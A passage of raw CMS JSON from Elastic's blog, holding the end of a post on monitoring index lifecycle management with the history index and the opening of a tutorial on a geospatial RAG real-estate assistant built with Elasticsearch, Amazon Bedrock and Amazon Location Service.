cdb1f"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFurther down, we’ll enable a notification \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/kibana/current/action-types.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eaction\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e. For our example, we’ll use Elastic Cloud’s built-in SMTP server to email our on-call distribution email.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csdb35abdbabd2216b"}}},{"image":{"image":{"uid":"bltc497d0dd60f64f9a","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-26T19:40:33.824Z","created_by":"bltb6c155cd84fc0c1a","file_size":"266368","filename":"11.png","parent_uid":null,"tags":[],"title":"11.png","updated_at":"2024-11-26T19:40:33.824Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-29T14:00:00.956Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltc497d0dd60f64f9a/674624319457b57c8f437d68/11.png"},"_metadata":{"uid":"cs23ac54eae11ba610"},"caption_l10n":"","alt_text_l10n":"","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs69a94cca965f5ef1"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAnd that’s it! The example team will now be notified when intervention is required to keep ILM healthy by using the ILM history index. When your team is notified, they may be interested in our \u003c/span\u003e\u003ca href=\"https://www.youtube.com/watch?v=VCIqkji3IwY\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003ewalkthrough video on checking ILM Health\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e and our \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/master/index-lifecycle-error-handling.html#_setting_index_lifecycle_rollover_alias_for_index_y_is_empty_or_not_defined\"\u003e\u003cspan style='font-size: 12pt;'\u003ecommon setup issues and resolutions\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e. Here’s to a quiet on-call for us all!\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs60de14bf45125079"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs043a6b6fb9aa0e55"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs72202d4c4fccf60e"}}}],"publish_date":"2024-11-29","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"bltc3067ddccda555c1","ACL":{},"created_at":"2023-11-06T21:50:08.806Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elastic-cloud","label_l10n":"Elastic Cloud","tags":[],"title":"Elastic Cloud","updated_at":"2023-11-06T21:50:08.806Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.096Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"blt4ce45bbfeeff0638","ACL":{},"created_at":"2021-07-12T21:53:30.326Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"logs","label_l10n":"Logs","tags":[],"title":"Logs","updated_at":"2021-07-12T21:53:30.326Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:05:22.411Z","user":"blt4b2e1169881270a8"}}],"tags_industry":[],"tags_partner":[],"tags_topic":[{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt3184f3496194138e","ACL":{},"created_at":"2023-11-06T20:36:32.173Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"customer-support","label_l10n":"Customer support","tags":[],"title":"Customer support","updated_at":"2023-11-06T20:36:32.173Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:33:19.257Z","user":"blt4b2e1169881270a8"}}],"tags_use_case":[{"_version":1,"locale":"en-us","uid":"bltbc86a233655f4b8e","ACL":{},"created_at":"2022-09-13T16:43:08.111Z","created_by":"blt36e890d06c5ec32c","hidden_value":false,"keyword":"elasticsearch","label_l10n":"Elasticsearch","tags":[],"title":"Elasticsearch","updated_at":"2022-09-13T16:43:08.111Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.253Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"blt7f695e8ab7610f31","_version":1,"is_dir":false,"ACL":{},"content_type":"image/jpeg","created_at":"2024-11-26T19:53:30.812Z","created_by":"bltb6c155cd84fc0c1a","file_size":"180644","filename":"139686_-_Elastic_-_Headers_-_V1-4_(1).jpg","parent_uid":null,"tags":[],"title":"139686 - Elastic - Headers - V1-4 (1).jpg","updated_at":"2024-11-26T19:53:30.812Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-29T14:00:00.985Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt7f695e8ab7610f31/6746273a90460d6873eeba5f/139686_-_Elastic_-_Headers_-_V1-4_(1).jpg"},"title":"Monitoring Elasticsearch index lifecycle management with the history index","title_l10n":"Monitoring Elasticsearch index lifecycle management with the history index","updated_at":"2024-11-26T19:56:06.993Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/elasticsearch-index-lifecycle-management-history-index","publish_details":{"time":"2024-11-29T14:00:00.886Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt6588745a7555e523","_version":4,"locale":"en-us","ACL":{},"abstract_l10n":"This blog explores how to build a powerful retrieval augmented generation (RAG) system that incorporates geospatial data using Elasticsearch, Amazon Bedrock, and LangChain.","author":["blt5913558de3429222","blt2e7c8afc9665fff8","blt142606b9c3d7b6aa"],"category":["blte5cc8450a098ce5e"],"created_at":"2024-11-26T15:44:19.352Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csc1ada5f505153a5f"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWith Elasticsearch and its vector database, you can build configurable search and trusted generative AI (GenAI) experiences that scale from prototype to production fast. Key features include:\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eBuilt-in support for geospatial data, enabling fast queries of location-based information\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eVector database capabilities for storing, managing, and querying vector embeddings\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIntegration of traditional lexical search with geospatial and vector search functionalities\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic stands out by combining these features in a single data platform — \u003c/span\u003e\u003ca href=\"https://www.elastic.co/platform\"\u003e\u003cspan style='font-size: 12pt;'\u003ethe Elastic Search AI Platform\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e. This trifecta integration facilitates modern generative AI use cases and provides significant value to customers by simplifying data management for enterprises.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIn this blog post, we'll explore how to build a powerful retrieval augmented generation (RAG) system that incorporates geospatial data using Elasticsearch, Amazon Bedrock, and LangChain. This hybrid approach combines lexical search, geospatial queries, and vector similarity search to create an intelligent real estate assistant capable of providing personalized property recommendations.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Technology overview","_metadata":{"uid":"csb4db6bc49fe5765a"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe integration of AI with geospatial data represents a significant advancement in information retrieval and decision support systems. Traditional search engines often struggle with location-based queries, but by combining the power of large language models (LLMs) with specialized geospatial databases, we can create more intelligent and context-aware applications.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003ca href=\"https://aws.amazon.com/bedrock/\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eAmazon Bedrock\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e gives the power of choice to developers to choose any of the industry leading foundation models (FMs) from the leading AI providers with simplified, unified APIs so that developers can build and scale generative AI applications in an enterprise.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic can store, run queries, and perform \u003c/span\u003e\u003ca href=\"https://www.elastic.co/geospatial\"\u003e\u003cspan style='font-size: 12pt;'\u003egeospatial analysis at Elastic speed and scale\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e. Elastic is also a production-ready billion scale \u003c/span\u003e\u003ca href=\"https://www.elastic.co/elasticsearch/vector-database\"\u003e\u003cspan style='font-size: 12pt;'\u003evector database\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e. This enables users to create, store, and search vector embeddings within Elastic.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThis also brings up a unique feature of Elastic where you can combine traditional lexical search with geospatial querying capabilities and add on to those vector similarity searches to craft innovative generative AI applications.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIn order to build an application from the ground up, let's look at RAG.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Retrieval augmented generation","_metadata":{"uid":"cs76dd4aaf9f1ecb8c"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eRAG is a powerful technique that enhances LLMs by integrating external knowledge sources. It improves the accuracy, relevance, and trustworthiness of LLM outputs without requiring model retraining.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eRAG also enhances text generation by incorporating information from private or proprietary data sources. This technique combines a retrieval model that searches large data sets or knowledge bases with a generation model like an LLM to produce readable text responses.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Application architecture","_metadata":{"uid":"csc3dd243e499e14ba"},"header_style":"H2","paragraph_l10n":""}],"_metadata":{"uid":"cs0d3b422c5c357e18"}}},{"image":{"image":{"uid":"blt08fd47f6f39775f4","_version":1,"title":"hybridgeospatial.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-11-26T15:15:12.989Z","updated_at":"2024-11-26T15:15:12.989Z","content_type":"image/png","file_size":"181033","filename":"hybridgeospatial.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-26T16:02:41.903Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt08fd47f6f39775f4/6745e600a1696b008379fde8/hybridgeospatial.png"},"_metadata":{"uid":"csd12b54063f28cb2b"},"caption_l10n":"","alt_text_l10n":"hybrid geospatial rag ","disable_lightbox":false,"remove_shadow":true,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csb423c268501b5709"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='color:rgb(35, 47, 60);font-size: 12pt;'\u003eThis reference architecture explains how to build a sample conversational AI assistant for the real estate industry using Elasticsearch, AWS Location Service, AWS Data Exchange, and Amazon Bedrock.\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='color:rgb(35, 47, 60);font-size: 12pt;'\u003e\u003cstrong\u003eStep 1:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='color:rgb(35, 47, 60);font-size: 12pt;'\u003e The user submits a query about properties in an area — “Find me townhomes with a swimming pool within 2 miles of 33 Union Sq, Cupertino, CA.”\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='color:rgb(35, 47, 60);font-size: 12pt;'\u003e\u003cstrong\u003eStep 2:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='color:rgb(35, 47, 60);font-size: 12pt;'\u003e The conversational AI assistant application calls the REST API through the Amazon API Gateway.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='color:rgb(35, 47, 60);font-size: 12pt;'\u003e\u003cstrong\u003eStep 3: \u003c/strong\u003e\u003c/span\u003e\u003cspan style='color:rgb(35, 47, 60);font-size: 12pt;'\u003eThe REST API makes a call to the AWS Lambda function forwarding the user prompt.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='color:rgb(35, 47, 60);font-size: 12pt;'\u003e\u003cstrong\u003eStep 4, 5:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='color:rgb(35, 47, 60);font-size: 12pt;'\u003e The AWS Lambda function calls Anthropic Claude 3 Sonnet through Amazon Bedrock for extracting entities like address, distance, and type of property. It also generates embeddings of the keywords.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='color:rgb(35, 47, 60);font-size: 12pt;'\u003e\u003cstrong\u003eStep 6, 7:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='color:rgb(35, 47, 60);font-size: 12pt;'\u003e The AWS Lambda function passes the address to AWS Location Service to get the corresponding geo-coordinates (geocoding).\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='color:rgb(35, 47, 60);font-size: 12pt;'\u003e\u003cstrong\u003eStep 8, 9:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='color:rgb(35, 47, 60);font-size: 12pt;'\u003e The AWS Lambda function makes a hybrid geospatial call (keyword kNN + geo-distance) to Elasticsearch to retrieve relevant properties as context.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='color:rgb(35, 47, 60);font-size: 12pt;'\u003e\u003cstrong\u003eStep 10, 11:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='color:rgb(35, 47, 60);font-size: 12pt;'\u003e The retrieved data is augmented with other relevant attributes of the location from data sources hosted in AWS Data Exchange.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='color:rgb(35, 47, 60);font-size: 12pt;'\u003e\u003cstrong\u003eStep 12, 13:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='color:rgb(35, 47, 60);font-size: 12pt;'\u003e The retrieved and augmented data is passed as context to Anthropic Claude 3 Sonnet for generating a summary.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='color:rgb(35, 47, 60);font-size: 12pt;'\u003e\u003cstrong\u003eStep 14, 15, 16:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='color:rgb(35, 47, 60);font-size: 12pt;'\u003e The summary is passed back to the AI assistant and to the user.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='color:rgb(35, 47, 60);font-size: 12pt;'\u003e\u003cstrong\u003eStep 17:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='color:rgb(35, 47, 60);font-size: 12pt;'\u003e Optionally, the details are also emailed using Amazon SES to the user.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Implementation details","_metadata":{"uid":"cs350c7a65a48e7b13"},"header_style":"H2","paragraph_l10n":""},{"title_l10n":"Use case","_metadata":{"uid":"csa90aa7ca7ede3f3f"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWe will develop a generative AI application to enhance the user experience in real estate property searches. This application features a conversational AI assistant that answers questions about property listings in our database. Users can interact with the assistant using natural language.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFor example, a user might ask: \"Find a single family home near Frisco, TX within 5 miles with a backyard swimming pool.\"\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Named entity recognition (NER)","_metadata":{"uid":"cs7b4bc0c8f2f931ca"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eNER, or entity extraction, is a natural language processing technique that identifies and classifies named entities within text. NER algorithms detect and extract specific entities, such as person names, organizations, locations, dates, and custom categories, from unstructured text.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eIn our case, we will extract the search property location (example: San Francisco) in which a user is looking for the property type, such as \"Single family home\" or a \"Condominium\"; the distance within which these properties can be found; and any additional property features, such as a swimming pool in the backyard.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eWe create a prompt template with a single-shot prompting technique giving an example for the LLM on how to extract entities from the user entered prompt. Here is an \u003c/span\u003e\u003ca href=\"https://github.com/aws-samples/aws-generativeai-partner-samples/blob/64c18ea61ed7f31fe46a19e690d60c956ab46c60/elastic/stream-lit-app/geo-spatial-rag-elastic-bedrock.py#L48\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eexample code snippet\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e for our real estate property listing use case.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eSteps\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003col\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eCreate a user \u003c/span\u003e\u003ca href=\"https://github.com/aws-samples/aws-generativeai-partner-samples/blob/64c18ea61ed7f31fe46a19e690d60c956ab46c60/elastic/stream-lit-app/geo-spatial-rag-elastic-bedrock.py#L89C1-L90C56\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eprompt template\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e and pass the end user prompt as an input variable.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eNext, \u003c/span\u003e\u003ca href=\"https://github.com/aws-samples/aws-generativeai-partner-samples/blob/64c18ea61ed7f31fe46a19e690d60c956ab46c60/elastic/stream-lit-app/geo-spatial-rag-elastic-bedrock.py#L108-L111\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003einvoke Amazon Bedrock service\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e and pass the above inference to a LLM of your choice. In this case, we are using \u003c/span\u003e\u003ca href=\"https://github.com/aws-samples/aws-generativeai-partner-samples/blob/64c18ea61ed7f31fe46a19e690d60c956ab46c60/elastic/stream-lit-app/geo-spatial-rag-elastic-bedrock.py#L45\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAnthropic Claude Sonnet 3\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e as an example.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eFor a given end user prompt as input, the output from the named entity recognition would be like:\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ol\u003e\u003cp\u003e\u003c/p\u003e\u003ctable\u003e\u003ctbody\u003e\u003ctr\u003e\u003ctd\u003e\u003cspan style=\"font-size: 12pt;\"\u003eInput user prompt\u003c/span\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cspan style=\"font-size: 12pt;\"\u003e“Find me townhomes near Frisco, TX within 5 miles with a community swimming pool access”\u003c/span\u003e\u003c/td\u003e\u003c/tr\u003e\u003c/tbody\u003e\u003c/table\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cbr /\u003eOutput (extracted entities):\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003c/span\u003e\u003c/p\u003e\u003ctable\u003e\u003ctbody\u003e\u003ctr\u003e\u003ctd\u003e\u003cspan style=\"font-size: 12pt;\"\u003eProgramming Language: JSON\u003c/span\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e{\u003cbr /\u003e\u003c/span\u003e \u003cspan style=\"font-size: 12pt;\"\u003e\"\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003esearch_property_type\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\": \"Townhouse\",\u003cbr /\u003e\u003c/span\u003e \u003cspan style=\"font-size: 12pt;\"\u003e\"\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003esearch_property_address\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\": \"Frisco, TX\",\u003c/span\u003e\u003cbr /\u003e\u003cspan style=\"font-size: 12pt;\"\u003e \"\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003esearch_property_radius\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\": \"5mi\",\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cbr /\u003e \"\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003esearch_property_features\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\": \"community swimming pool access\"\u003c/span\u003e\u003cbr /\u003e\u003cspan style=\"font-size: 12pt;\"\u003e}\u003c/span\u003e\u003c/p\u003e\u003c/td\u003e\u003c/tr\u003e\u003c/tbody\u003e\u003c/table\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cbr /\u003eThe \u003c/span\u003e\u003ca href=\"https://github.com/aws-samples/aws-generativeai-partner-samples/tree/main/elastic/stream-lit-app\" target=\"_blank\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003estreamlit app\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e reflects this in the user interface as:\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs4f5da5fc5f05cef4"}}},{"image":{"image":{"uid":"blt87ed968d17665f9d","_version":1,"title":"image2.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-11-26T15:20:40.171Z","updated_at":"2024-11-26T15:20:40.171Z","content_type":"image/png","file_size":"225045","filename":"image2.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-26T16:02:41.878Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt87ed968d17665f9d/6745e7482eb39e3b39afab0d/image2.png"},"_metadata":{"uid":"cs3e78e4efd032739b"},"caption_l10n":"","alt_text_l10n":"hybrid geospatial rag using elastic and amazon bedrock","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":"width-large: 75%"}}},{"title_text":{"title_text":[{"title_l10n":"Geocoding using Amazon Location Service","_metadata":{"uid":"csf16fc28c49e2d6e2"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eGeocoding is the process of converting addresses like a street address into geographic coordinates (latitude and longitude), which can be used to place markers on a map or identify locations in spatial data. It helps map a physical location, such as \"1600 Pennsylvania Ave NW, Washington, DC,\" into its corresponding geographic coordinates, enabling applications like GPS navigation or any location-based services.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe purpose of geocoding, in our case, is to convert the extracted geographical location from the user prompt into longitude and latitude so that these coordinates can be used to search for real estate property data in Elastic.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003ca href=\"https://aws.amazon.com/location/\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eAmazon Location Service\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e can be of help here in the geocoding process. Amazon Location Service is a mapping service that allows you to add geospatial data and location functionality to applications, including dynamic and static maps, places search and geocodes, route planning, and device tracking and geofencing capabilities.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eHere is the \u003c/span\u003e\u003ca href=\"https://github.com/aws-samples/aws-generativeai-partner-samples/blob/64c18ea61ed7f31fe46a19e690d60c956ab46c60/elastic/stream-lit-app/geo-spatial-rag-elastic-bedrock.py#L138C1-L170C20\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003esample code\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e from the \u003c/span\u003e\u003ca href=\"https://github.com/aws-samples/aws-generativeai-partner-samples/tree/main/elastic/stream-lit-app\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eStreamlit git repo\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e for geocoding using Amazon Location Service. The output generated from geocoding process will look like this in the \u003c/span\u003e\u003ca href=\"https://github.com/aws-samples/aws-generativeai-partner-samples/tree/main/elastic/stream-lit-app\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eStreamlit application\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e:\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs3fbbed6156cf14b3"}}},{"image":{"image":{"uid":"blt63e8d6124d0832c2","_version":1,"title":"image5.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-11-26T15:21:48.964Z","updated_at":"2024-11-26T15:21:48.964Z","content_type":"image/png","file_size":"224964","filename":"image5.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-26T16:02:41.864Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt63e8d6124d0832c2/6745e78c1621f66ca96e6a03/image5.png"},"_metadata":{"uid":"cs805600638b58e0eb"},"caption_l10n":"","alt_text_l10n":"geocoding using amazon location services at work","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":"width-large: 75%"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs908effab6954e1d8"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAn important output detail that we get from the above geocoding process is the longitude and latitude coordinates, which can be used to perform a geospatial search for data in Elastic.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Hybrid geospatial query in Elastic","_metadata":{"uid":"csafe47b868b018c19"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThe key feature of this application is Elastic's ability to perform a hybrid geospatial search. This search combines:\u003c/span\u003e\u003c/p\u003e\u003col\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eLexical search\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eGeospatial search\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eVector similarity search\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ol\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cbr /\u003eElastic executes all of these search types in a single query, creating a powerful and efficient search capability. Here is the code snippet. You can also see this in the \u003c/span\u003e\u003ca 